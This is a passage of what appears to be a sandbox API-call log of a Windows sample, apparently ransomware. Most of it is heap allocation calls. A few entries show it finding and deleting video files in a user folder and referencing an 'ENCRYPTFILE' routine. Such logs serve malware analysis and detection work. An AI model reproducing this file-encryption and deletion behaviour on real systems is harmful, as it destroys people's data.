(HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9ab0 [0105.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a80e8 [0105.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a88c8 [0105.231] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\38VodG.mp4", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0e7ec70, ftCreationTime.dwHighDateTime=0x1d5e673, ftLastAccessTime.dwLowDateTime=0xc6aa11d0, ftLastAccessTime.dwHighDateTime=0x1d5e969, ftLastWriteTime.dwLowDateTime=0xc6aa11d0, ftLastWriteTime.dwHighDateTime=0x1d5e969, nFileSizeHigh=0x0, nFileSizeLow=0xca0e, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="38VodG.mp4", cAlternateFileName="")) returned 0x41ac000 [0105.231] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\38VodG.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\38vodg.mp4")) returned 1 [0105.276] FindNextFileW (in: hFindFile=0x41ac000, lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0e7ec70, ftCreationTime.dwHighDateTime=0x1d5e673, ftLastAccessTime.dwLowDateTime=0xc6aa11d0, ftLastAccessTime.dwHighDateTime=0x1d5e969, ftLastWriteTime.dwLowDateTime=0xc6aa11d0, ftLastWriteTime.dwHighDateTime=0x1d5e969, nFileSizeHigh=0x0, nFileSizeLow=0xca0e, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="38VodG.mp4", cAlternateFileName="")) returned 0 [0105.276] FindClose (in: hFindFile=0x41ac000 | out: hFindFile=0x41ac000) returned 1 [0105.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a88c8 | out: hHeap=0x1780000) returned 1 [0105.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0105.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0105.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0105.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42da070 | out: hHeap=0x1780000) returned 1 [0105.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0105.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0105.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0105.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0105.277] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0105.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0105.277] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0105.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0105.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0105.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0105.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0105.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0105.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0105.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0105.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0105.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0105.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8260 | out: hHeap=0x1780000) returned 1 [0105.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0105.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0105.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0105.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0105.277] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0105.277] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0105.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0105.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0105.277] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0105.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0105.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0105.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0105.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2850 [0105.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0105.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0105.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0105.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0105.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0105.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0105.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0105.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0105.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7ef0 [0105.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0105.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0105.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0105.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0105.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1a0) returned 0x43e8260 [0105.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7ef0 | out: hHeap=0x1780000) returned 1 [0105.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0105.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0105.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0105.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0105.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0105.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0105.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0105.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0105.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0105.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0105.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0105.278] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0105.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0105.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0105.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0105.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0105.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0105.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0105.279] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0105.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0105.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0105.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0105.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0105.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0105.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0105.279] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\C98TxuIy1khtVyZ_cTR.avi", lpFindFileData=0x144e718 | out: lpFindFileData=0x144e718*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55aa7690, ftCreationTime.dwHighDateTime=0x1d5ea91, ftLastAccessTime.dwLowDateTime=0xd1eca410, ftLastAccessTime.dwHighDateTime=0x1d5f0d3, ftLastWriteTime.dwLowDateTime=0xd1eca410, ftLastWriteTime.dwHighDateTime=0x1d5f0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd0cb, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="C98TxuIy1khtVyZ_cTR.avi", cAlternateFileName="C98TXU~1.AVI")) returned 0x41ac700 [0105.279] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0105.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0105.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0105.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0105.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0105.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0105.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0105.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0105.279] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0105.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0105.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0105.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0105.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2890 [0105.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0105.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0105.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0105.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0105.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0105.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4a8 [0105.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0105.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0105.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0105.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0105.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0105.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0105.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0105.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0105.280] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0105.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0105.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0105.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0105.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0105.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0105.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0105.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0105.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0105.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0105.280] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0105.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0105.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0105.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2800 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0105.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28b0 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0105.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28a0 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0105.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0105.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0105.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0105.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0105.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0105.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0105.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0105.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0105.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0105.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0105.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0105.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0105.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0105.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0105.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0105.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0105.283] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0105.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0105.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0105.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0105.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0105.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0105.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0105.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0105.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0105.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0105.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0105.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0105.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0105.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0105.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0105.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0105.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0105.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0105.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0105.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0105.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0105.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0105.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0105.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0105.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0105.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0105.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0105.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0105.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0105.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0105.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0105.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0105.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0105.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0105.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0105.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0105.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0105.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0105.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0105.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 